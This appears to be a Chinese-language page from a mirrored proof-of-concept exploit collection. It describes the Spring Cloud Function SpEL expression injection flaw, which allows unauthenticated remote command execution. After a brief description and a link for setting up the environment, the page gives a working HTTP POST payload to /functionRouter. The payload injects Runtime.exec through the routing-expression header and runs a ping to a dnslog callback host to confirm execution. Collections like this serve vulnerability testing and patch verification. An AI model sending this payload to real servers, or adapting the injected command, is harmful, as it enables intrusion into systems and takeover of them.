admin/Awesome-POC
1
0
Fork 0
mirror of https://github.com/Threekiii/Awesome-POC.git synced 2025-11-08 04:18:39 +00:00
Code Issues Packages Projects Releases Wiki Activity
Awesome-POC/开发框架漏洞/Spring Cloud Function SPEL 远程命令执行漏洞.md

34 lines
1.2 KiB
Markdown
Raw Normal View History

更新漏洞库:开发框架漏洞/
2022-05-19 16:37:53 +08:00
# Spring Cloud Function SPEL 远程命令执行漏洞
## 漏洞描述
Spring Cloud Function 是基于Spring Boot 的函数计算框架,它抽象出所有传输细节和基础架构,允许开发人员保留所有熟悉的工具和流程,并专注于业务逻辑。 由于Spring Cloud Function中RoutingFunction类的apply方法将请求头中的“spring.cloud.function.routing-expression”参数作为Spel表达式进行处理造成了Spel表达式注入漏洞未经授权的远程攻击者可利用该漏洞执行任意代码。
## 漏洞影响
```
Spring Cloud Function
```
## 环境搭建
- https://github.com/spring-cloud/spring-cloud-function/tree/main/spring-cloud-function-samples/function-sample-pojo
## 漏洞复现
搭建后访问
![image-20220519160206177](https://typora-notes-1308934770.cos.ap-beijing.myqcloud.com/202205191602220.png)
发送POC
```
POST /functionRouter HTTP/1.1
Host: 192.168.1.27:9000
spring.cloud.function.routing-expression: T(java.lang.Runtime).getRuntime().exec("ping -c 1 dxytoy.dnslog.cn")
Content-Length: 1
```
接收到请求
![image-20220519160240168](https://typora-notes-1308934770.cos.ap-beijing.myqcloud.com/202205191602216.png)
Reference in New Issue Copy Permalink